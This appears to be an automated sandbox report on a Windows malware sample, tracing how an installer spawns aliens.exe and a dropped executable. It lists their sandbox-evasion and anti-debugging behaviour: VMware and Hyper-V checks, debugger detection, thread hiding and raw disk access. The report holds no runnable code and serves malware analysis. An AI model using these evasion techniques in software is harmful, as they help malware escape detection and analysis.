Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100202D0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_057C5AA0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100202D0

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Code function: 6_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100202D0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100202D0

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe TID: 940	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 1372	Thread sleep time: -30000s >= -30000s

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

File opened: PhysicalDrive0

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100223C0 GetLocalTime followed by cmp: cmp ecx, 01h and CTI: jl 10022474h
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100223C0 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jnle 10022474h
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100223C0 GetLocalTime followed by cmp: cmp ecx, 01h and CTI: jl 10022474h
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100223C0 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jnle 10022474h

Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8D1C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8E0F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008AA534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BB820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008CA928 FindFirstFileExA,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_00402D09 FindFirstFileA,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_004066CC FindFirstFileA,FindClose,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05867950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05865A90 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1001A170 FindFirstFileA,FindClose,

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

Code function: 1_2_008BDBC8 VirtualQuery,GetSystemInfo,SetShellWindowEx,

Source: 1E1C360C582DF797.exe, 0000000F.00000002.1014319310.0000000004DDD000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 1E1C360C582DF797.exe, 0000000F.00000003.998392579.00000000050DD000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 0000000F.00000003.1000246980.00000000050E0000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}X
Source: 1E1C360C582DF797.exe, 0000000F.00000003.998413143.00000000050D6000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter}
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009251772.0000000002796000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW Area Connection* 6
Source: 1E1C360C582DF797.exe, 0000000F.00000003.998392579.00000000050DD000.00000004.00000001.sdmp	Binary or memory string: BatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 0000000F.00000003.1000246980.00000000050E0000.00000004.00000001.sdmp	Binary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 0000000F.00000003.998392579.00000000050DD000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009251772.0000000002796000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1007464844.0000000000194000.00000004.00000001.sdmp	Binary or memory string: VMware Virtual disk 2.0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1007464844.0000000000194000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1009586899.00000000042A8000.00000004.00000040.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 0000000F.00000003.1000246980.00000000050E0000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}

Source: C:\Users\user\AppData\Roaming\1607153318099.exe

Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Code function: 6_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,

Hides threads from debuggers

Show sources

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Thread information set: HideFromDebugger

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Process queried: DebugFlags

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8E52CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8D041D OutputDebugStringA,GetLastError,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8F2571 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8F80EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C7363 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_00404C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10019ED0 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8B1660 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,CloseHandle,GetProcessHeap,HeapFree,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Process created: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe' -s

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8DFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8E52CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BEEB3 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BF07B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008C84EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BED65 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_0040825D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05748D22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05746CE8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05743315 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Code function: 6_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,

Source: aliens.exe, 00000006.00000002.1008642147.0000000002E40000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1009438085.0000000002DD0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: aliens.exe, 00000006.00000002.1008642147.0000000002E40000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1009438085.0000000002DD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: aliens.exe, 00000006.00000002.1008642147.0000000002E40000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1009438085.0000000002DD0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: aliens.exe, 00000006.00000002.1008642147.0000000002E40000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1009438085.0000000002DD0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

Code function: 1_2_008BEBBB cpuid

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: GetLocaleInfoW,GetNumberFormatW,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: GetLocaleInfoA,_xtoa_s@20,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: GetLocaleInfoA,
